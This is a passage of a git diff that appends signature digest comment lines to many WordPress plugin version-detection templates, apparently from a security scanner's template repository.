'(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220067f065ca4ac2ae2b402ae5fb2f6a4c9418596968ae0e70dbc5467289d23a8a2022100cab431108cdf42b02b5fa17a6b61a981b7e2da05fdebda8ccd916499bcc3d74b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..030b087c15 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d8d0636ebc381cb9c5cc68a57083a021a92ce0d2515ecd41db039d06c2fae15702206c3800f4032f70ac17dbc054164f36b5dac8619c5b438ba6350a04ec9270e746:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index c1a44066bb..e3f2f62202 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207f231313a1d7f784b0e3f8c1023e270e7e7ad9d8affa7c10691d0279e2c8046a022017328f9e794f377d1c79b3c66004ca6a978c0bbcc0f06b37f2f55b5f65986d3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..0bd692849d 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022037f7ddc8622c9375c607f3aea398224baadad8799054b4e4097a5c525c3b4b2402207f8ba20b1993492fc4879ea0f5879562e9550adedfbee559313068f01aed6b69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..97a6efbc08 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200e11c7e70e5c1d1e94c749d32afcf738dcc7bf2cc1313baf5902d8140bd1e67c022100a377c62c748d58e77642cbcffe0db06ce05eac7fa83ab347bb770bfd2b07a644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..18031a5b6c 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205c722a2db9b5bb577a550ce2fc65acea3f6a493c428e574a01b445fe359ef6f6022100f0512ced065e8a3afc095d45b8623c2b5a00c75aaf30ba7d32f24f5d30222002:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..211b91de58 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022003162b98fd86043d276b893d434e544a1bf70aee96631097925028be714dae730220300b78c59b069a4bc96114b0b7119c5c2db7593a85c3a51030634255c3c2ae44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..729b3cf42f 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220648f754255dbb8cb1b9b92efbd46eff1f302c08f8b9bba143a1f5f68837a010d022049079fd8e295e8a4be0b7a56599f4139f1e9c672b709ded0f0c765b61dcc8c94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..92e564ee33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201876aa141c3f36438f35055782eacd674ae72bf9d8529ba3f27ced64d2fa4e61022064396ad33a8067910327412dbb6ce90749645815c10e511a38b529d89d1b0c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..5ab5adecdc 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207bc74791c45989b7c2327ddf00f82d0509260ccd7f372a3b57e28f3931552dc1022100ac897eccd5264a204ae1b3c695bbe32cbe4944b7cbff1946312c226bb6cfb200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..38aee28a3d 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201595bde9d74a98503804e984f306ba373d45cb76a1f25e52f381fc09974bf9520221008f1e545e26618732cb8457ac9c9cc055146e63e7b9820849761a9b2eb25997c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..ace8e61e76 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b081e1db671ae56175e84751e3b4d381b5962173c62c39945c1a0074ce09619022058a430adc5d3e023d2a50303526c9815a414e8c8e90bf2d9d1da882602f9cba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..ac891af302 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009c31edd1d050d76c716de367a3218c3febfeaf516edc1bf7fc464df1f37ea830022100ba25e2580fef6ebe0b933a7cdabbf48aaee6c1aff048eec75e182ffc9ec6f4e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..f125b45b96 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e38426baf1d6e701c16b9344c2c9e8358bac269e1016841254d6de35b67673f902210086ca30819d86c6fe6fb023f58a677378b6cbb40a1a0c91ba6575ade57926b284:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..5231871726 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205fbda3ceffa667305b34f1e26d262b2b0d6b7092a99bf5a2238016786819b546022100da0e8e370f0d0a17409d4e83542a84356fd2aa7c36c358e676721199b0fc3f70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..328397c184 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220699dee988b509f1504fb7d2d27fd14446b75b04e92206532acec4f931b43a85402201cbcb6c6004eacb09e517bed7c96a8becb373babd93c1263080905ee7e87018e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..2ffb01e0c9 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022055c570a306e14aef5061d3702038f61b32e45bbc5fbb3e3800d023cedc84ef6d02204a1e93aa71a35203f2d32ebff57e917f5c4c564b9ad8ef655f0e5e66a2eebced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..ce396ac8ee 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204a8cfe8bc48d1cb177c39da9946def7d0ff5e6ae99028839dea265d2b655d0100220584e9ce7a9a820e7c4fe879179463fa7bd536b74188e2d7911983f5d7554cbd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..9e8ba37515 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022009743b09f5ded8d5bb8efe56f902c6e9d49093ab12bf47030f077d07f114015a02205c32319fff5a09925f859b317f42392ba538bf662072d416a87fe83d54db0d0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..08f41ea846 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009b5ae666c801438058812bee24128bc06dd8fb458aa99f492503d86bf078e3fe022100e13917c05de1e0e8adb24f79d14e0f7e53e4710fc5736b7f9a53fa6171e795be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..1f148efa4d 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206bcd14c693d4ce99cc9187b2a391f8bc025336e520fb0144fa11db1fb92beb5d022100cdc0e6d3262106346ec79904dcb18fa6cb079519c5417a6fb2b29fb760a58e0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 540d535ecc..ab06d52234 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203afb4bef84102db576209224b17ba7b56d46630a5a738b3da55d31eea4b240da02210089948d53a52c6b8311304bfe13f733022f0c72eaa9e4c7f8b6bfeef0104f8d67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..4c5a4d4b04 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f6f0a9947738aa004e48e59af1e7545d214415c04c4a77b1c5a5496185be94a102202c5038c67e0b2de8305c98a31e82a39557919c12db274381112b107954c3477a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..29879d220d 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d5f3e2cf2a2ec34a05524b395c28d60af629a32d279bc98b031773d60b436e35022100a258ad964aca58696f00fca0bca30e85c5bc07bf3a9fe9d9751d7c4f0c3fa82d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..b5ba128d84 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c4732c97ea310ffc0a53ba44833b0ae5ca62fe22aff51c92938c2881c6ec3a88022100c23fb87212a84b3ca9f00f50da46788e785100b4354c0d082ac06fe4d48aff76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..b00ef43507 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cb507d5f187e5435cf6af3585831e79878faf3394823093019db843c41ff233802201e55ac555abfbeca39076ee5135347b6c2162ca33e3fd7226cf3c6b63284ae97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..829200684a 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e1945847cc2ac8eb9baccff20cb8bcc1f7c516553692ae474fdf2f21350efd5c0221008e23450659866cc6a77ad0e46ecf4c777c386501ba326e1dfc260f28d028b6f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..5115bb91c4 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb4a1eb6f37dba7eec69bf7939257f8816910d903698dcef654174351c9d406902206fdbb5140d18782dd047f63d0c2407c1186893eb6c1acec09c9f92b5af55f037:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..b5a22bdb04 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b64a14b9550a8b5f2feafd320fb035b6a831405eaf691bcebd5897b4a118d28e022100a303e315845d92b76006b648b469969efef00393b854eee1509b36c9d842c737:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..ff66970fc1 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dce37376737526e452b890869d9367a2952c48bf1e032a20c84239f3ff0030c7022100889571451a44dda4506d0b6a3b764130e50a7ecf487d924d8b7f31bb44a826e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..52457a3e28 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210081a0a833e4f2ec15416f81e2f3644b3445d8dbb6586af505f25cfe02e32bcbf60220118ac13b9ec6f4d4bad79e2863e8afb2663d19752a0b800ea12d0ae4e1a7a1ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..0a9a30d3a3 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220190918a8756c2b849eee60b286f873c9e69920fd5c0d050ecca068acf675da2c02210082d83b6a9d1b6114adcb035a620cf52763f91c9f5de74664371889c9d3911a1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..050529ad9b 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203606afb5025caf90821ea609e814fd40d92578a0860515a422a71bdce7445a6802201fd6a963bc99bbc8ca6a7bf7a2e8e8b2fe5040165627c2bb7237868ff253c84b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..531da20729 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ba24d6ab0741e895a0e70dc0a9890ba287669afeccfecf7a40283aeb9da79b4002203203314dc6d7d254a1c1cd93255eaf137b22ccd7184a33d5eff25628f0a8c327:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..afc309fb98 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203435b372ebd877d2df427e8a369ea1b0b36e5de5560586c59ed1bb65788d472f022100a66c83672feb2c8e9b85cf5d2e48d2c37b8f9fba75bbb80dc938a8fc6137ca9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..eb34bdf842 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022053d6b5c37c2abb68332a0e5fe467d801420c9c750d801c4f2a09355af7a63ad4022100813e4b6dfbae25a0880f357be081aa2b74a628584ccbcad10e3485459cfc24ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..1587b23f4f 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100db3fcaa91854b34ada800de56b88cec39989917432b5dbfdd4de3b2a9abc65c90221008944dbdaca9ec62ec62ae67feb7fd957035862e9ba3a74fead68803912b81191:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..4d80ad13b5 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022078c20ae494f9445429acac1bdafa06f4bef8f36dff0223b2511d34ca40153e6802205e2d6bdb8999120c7a3e0a188f19fe42d99193629ec13110758cf9f3dad4d093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..15cc935666 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f5c346d4bad15e0ba0e4517e05807c38024b022662d804ad1b4d52ff2ed0f520221008497f8ae92a21b34d5f9809042e1ed72cde6e1ff0b887464e6177b1abffbf8a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..77ebc1726b 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e3f50c465226b28dcb053c425b6672e119c9b386536a921e52a6e7071f785eb50220032b2c3c86cf80879d3727d38824ec15f52fc42b26b99729e21741f8a1297c93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..6d8fe4f547 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fe24e91a37cba92c6ddf1a06c7ec3db57ec608a6272d1470ba7cde45c811bba8022100a16ee5c70cef98a6f98aa835d68ca3aedc63f288953ce9b93666365cc240df06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..677fd690f0 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206aa0eb93b24c04c826b228d45d5e42228d512a74b5314c077f0e1dc63b4281ee022076185ad6a5669ec6bb29864f83911cfde354b2be8221c569876ade7d9655d4a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..c48366c228 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cd1b84028b246a824dfced2a676c83110b0e7b7cb698713b52cd4fcae7599a9a02210091bb2a2090b663e733e60a80733b20e365eb73a13e74ac89edf4ef2a75379fa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..2937a58e67 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022021d96d7cfde3329234c1c5ff11e91c7f3eea61ea1c4b7c31c79af04db1f04fca02205fe7cc8705b56652047b89ae4adaf751414c0f9b9d2f3e5f5a76b920d89a39e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..a03cc9afb6 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c72dd81d05aca2b6c00a313707873843fcf95396679988e86e5b4cc78fb26fa2022100e749e746ef0ba06937f77f0a881a71e2650ba05f37e435c999bbe743ebf13dd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..aeaeb15cf9 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a62c5df2fa894175b6ac6e45cc0995829735431dbdcf48607b157ea778c81b96022100bf575b5e88a3427c9e5694d678e9c13427157fb9367264e07f0d630d29617e2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..29c2828486 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100967fabfd356a624c69e61adfe8ad70b3faaf03123abb596ac90c9a77060a24d4022100ddbf2f4d688ba4b2a97b28cc26c50faf3ec37d7e60c42aea482054358f998762:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..eb61d411ef 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b2bde05e776694ba3b9ce6d1a91319cedf3c0fc5835516f813a2177f5c10e8f7022100d4bf72398d782c7ca2779bf9c9f8cabcc3f20080cfe7f657c510f0113ea39369:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..4ff17acba7 